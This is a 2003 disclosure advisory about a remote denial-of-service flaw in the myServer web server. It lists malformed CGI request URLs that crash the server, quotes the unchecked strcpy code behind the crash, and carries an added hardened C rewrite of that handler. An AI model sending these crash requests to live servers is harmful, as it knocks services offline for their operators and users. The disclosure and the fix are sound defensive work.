myServer - Remote Denial of Service

2003-07-08T00:00:00
ID SECURITYVULNS:DOC:4794
Type securityvulns
Reporter Securityvulns
Modified 2003-07-08T00:00:00

Description


      - EXPL-A-2003-012 exploitlabs.com Advisory 012

                     -= myServer =-

Donnie Werner July 5, 2003

Vulnerability(s):

Denial of Service

Product:

myServer httpd - 4.2 ( current )
http://myserverweb.sourceforge.net
http://easynews.dl.sourceforge.net/sourceforge/myserverweb/myServerWIN32EXEC-0.4.2.zip
http://easynews.dl.sourceforge.net/sourceforge/myserverweb/myServerSRC-0.4.2.zip

Description of product:

"It is a web server that allow everybody to have his own web server for free. It is easy to configure and manage, it is available for linux and windows. It supports the CGI, ISAPI, WinCGI and FastCGI. Visit the homepage for more info."

note: http://www.securitytracker.com/alerts/2003/Jun/1006999.html has NOT been fixed as of version 4.2

http://www.security-protocols.com/print.php?sid=1534 appears fixed, or not an issue, in 4.2 under Windows

VULNERABILITY / EXPLOIT

tested on Windows XP / 2k

issuing either of the following requests...

http://[host]/cgi-bin/math_sum.mscgi?a=
http://[host]/cgi-bin/math_sum.mscgi??=

completely crashes the httpd on the remote host

probably because of this code in the CGI:

------------ snip ------------

/* the value returned by GetParam() is copied with neither a NULL check
   nor a length bound; a request without the parameter reaches strcpy()
   with whatever GetParam() returns for a missing name */
strcpy(a, cm.GetParam("a"));
strcpy(b, cm.GetParam("b"));

sprintf(c, "%i", atoi(a) + atoi(b));

------------ snip ------------

also: http://[host]/cgi-bin/post.mscgi??? crashes the server
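The snippet above copies whatever the parameter lookup returns straight into a fixed buffer. The following is an added example, not code from the advisory or from myServer: a hardened equivalent of the math_sum handler, written on the assumption (consistent with the crash described) that the lookup yields NULL when a parameter such as "a" or "b" is absent. The get_param() helper and the query-string format it parses are constructed for this example; the point is that every lookup result is checked for presence and length before any copy, so the malformed requests from the advisory get an error code instead of a crashed server.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed stand-in for the CGI's parameter lookup (hypothetical, not
   myServer's cm.GetParam()). Looks up `name` in a query string such as
   "a=3&b=4" and copies its value into `out`. Returns 0 on success, -1 if
   the parameter is absent (the case the original strcpy never checked)
   and -2 if the value would not fit in `outlen` bytes (the case strcpy
   never bounded). */
static int get_param(const char *query, const char *name, char *out, size_t outlen)
{
    size_t nlen = strlen(name);
    const char *p = query;

    while (*p) {
        const char *end = strchr(p, '&');                 /* end of this pair */
        size_t plen = end ? (size_t)(end - p) : strlen(p);
        const char *eq = memchr(p, '=', plen);            /* name/value split */
        size_t klen = eq ? (size_t)(eq - p) : plen;

        if (klen == nlen && memcmp(p, name, nlen) == 0) {
            const char *v = eq ? eq + 1 : p + plen;       /* empty if no '=' */
            size_t vlen = plen - (size_t)(v - p);
            if (vlen + 1 > outlen)
                return -2;                                /* refuse oversized input */
            memcpy(out, v, vlen);
            out[vlen] = '\0';
            return 0;
        }
        if (!end)
            break;
        p = end + 1;
    }
    return -1;                                            /* parameter missing */
}

/* Hardened equivalent of the math_sum CGI. Both lookups are checked before
   use, so "a=" (b missing) and "?=" (no usable name at all) return an error
   instead of dereferencing a NULL pointer. Writes the sum into `result` and
   returns 0, or returns the negative get_param() error code. */
static int math_sum(const char *query, char *result, size_t rlen)
{
    char a[32], b[32];
    int rc;

    if ((rc = get_param(query, "a", a, sizeof a)) != 0)
        return rc;
    if ((rc = get_param(query, "b", b, sizeof b)) != 0)
        return rc;

    /* strtol() on an empty value yields 0, as atoi() did in the original;
       the crash being fixed here is the unchecked pointer, not the parse. */
    snprintf(result, rlen, "%ld", strtol(a, NULL, 10) + strtol(b, NULL, 10));
    return 0;
}

int main(void)
{
    /* Constructed requests: one well-formed, then the two malformed query
       strings from the advisory with the leading '?' already stripped. */
    const char *reqs[] = { "a=3&b=4", "a=", "?=" };
    char out[32];
    size_t i;

    for (i = 0; i < sizeof reqs / sizeof reqs[0]; i++) {
        int rc = math_sum(reqs[i], out, sizeof out);
        if (rc == 0)
            printf("%-10s -> 200 sum=%s\n", reqs[i], out);
        else
            printf("%-10s -> 400 (error %d, no crash)\n", reqs[i], rc);
    }
    return 0;
}
```

A server-side fix of this shape is what the vendor's "fix is in CVS" would need to amount to: the caller must treat a missing parameter as a client error rather than assume the lookup always succeeds.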

Local:

no

Remote:

yes

Vendor Fix:

No fix at the time of disclosure (0day). The vendor has responded and claims the fix is in CVS and will be included in the upcoming 4.3 release.

Vendor Contact:

Concurrent with this advisory http://sourceforge.net/tracker/?func=add&group_id=63119&atid=502904

Credits:

Donnie Werner morning_wood@exploitlabs.com http://exploitlabs.com

thank you "nutcase" for confirmation testing